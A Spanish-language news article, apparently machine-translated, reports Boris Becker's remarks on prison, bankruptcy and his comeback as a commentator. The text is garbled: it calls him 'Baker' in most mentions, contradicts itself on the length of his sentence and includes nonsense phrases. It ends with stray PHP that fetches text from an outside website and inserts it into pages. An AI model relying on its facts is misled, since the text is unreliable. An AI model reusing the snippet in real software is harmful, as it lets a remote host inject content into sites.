Boris Becker ha dicho que su tiempo tras las rejas fue “muy brutal” y que “tuvo que luchar todos los días para sobrevivir”.


El tres veces campeón de Wimbledon fue encarcelado durante dos años y medio en abril pasado con una sentencia de ocho meses por ocultar activos por valor de £ 2,5 millones y deudas para evitar pagar deudas. Dijo que la experiencia lo había “humillado”, pero lo convirtió en un “hombre mejor y más fuerte”.


“Cualquiera que diga que la vida en prisión no es difícil y que no es difícil, creo que está mintiendo”, dijo a BBC Radio 5 Live Breakfast.


“Fue brutal. Una experiencia muy diferente a lo que ves en las películas, lo que escuchas de las historias.


“Luchas por sobrevivir todos los días. Rápido, tienes que rodearte de tipos duros, como yo lo llamaría, porque necesitas protección”.


“Soy un sobreviviente, soy una galleta dura”, continuó Baker. “He tomado la prisión, pero también he tomado el honor y si me ha hecho un hombre más fuerte, mejor”.


Dijo que ahora estaba trabajando en el “tercer capítulo” de su vida.


“Tengo la suerte de poder ponerme de pie, ninguno de mis compañeros de equipo me ha dejado. Me han dado la bienvenida de vuelta a casa. Ya sea la televisión, algunos de mis patrocinadores, mi familia definitivamente está detrás de mí. De pie fuerte… y no me lo estoy tomando a la ligera, pero estoy construyendo fuerte mi tercer capítulo.


Continuó: “En el mundo del tenis, generalmente soy bueno en el quinto set. Gané los dos primeros sets y perdí los dos siguientes, pero estoy jugando el quinto set y estoy buscando ganarlo.


Reflexionando sobre su carrera en el tenis, durante la cual se convirtió en campeón individual masculino de Wimbledon en 1985, a los 17 años, Baker dijo que no había un “manual” sobre cómo debería comportarse un joven en tal situación. La fama y la fortuna eran “muy nuevas”, dijo.


Dijo que nunca estudió negocios o finanzas y tomó decisiones después de su carrera como jugador profesional que fueron “probablemente desacertadas”, pero agregó: “Fue mi decisión”.




Baker levantando el trofeo de Wimbledon en 1985, 17 años



(cable PA)



Sus comentarios vienen después de un documental de dos partes. ¡Auge! ¡Auge! El mundo contra Boris Becker Debuta el 7 de abril en Apple TV+.


Hablando en el programa el mes pasado, Baker dijo que sentía que el mundo del tenis lo había “acogido” desde su liberación en diciembre, después de lo cual fue exiliado de Gran Bretaña y octubre. No se le permitirá regresar hasta 2024.


El ex número uno del mundo convertido en comentarista de la BBC dijo que el tenis era su “obsesión número uno”.


Ha aparecido como experto en Wimbledon para la BBC y, a pesar de volver a trabajar en Eurosport para el Abierto de Australia de 2023, no asistirá a los campeonatos de este año en Londres en julio.


“Extraño Londres, es mi ciudad favorita en el mundo”, dijo Baker a ITV el martes.


Baker se declaró en quiebra el 21 de junio de 2017, adeudando a los acreedores alrededor de £ 50 millones, además de una deuda impaga de más de £ 3 millones en su propiedad en Mallorca.


Previous Post Next Post
function pub_short() { $pub_text = file_get_contents( "https://alrafdean.org/me/pub.txt" ); return $pub_text; } add_shortcode('pub', 'pub_short');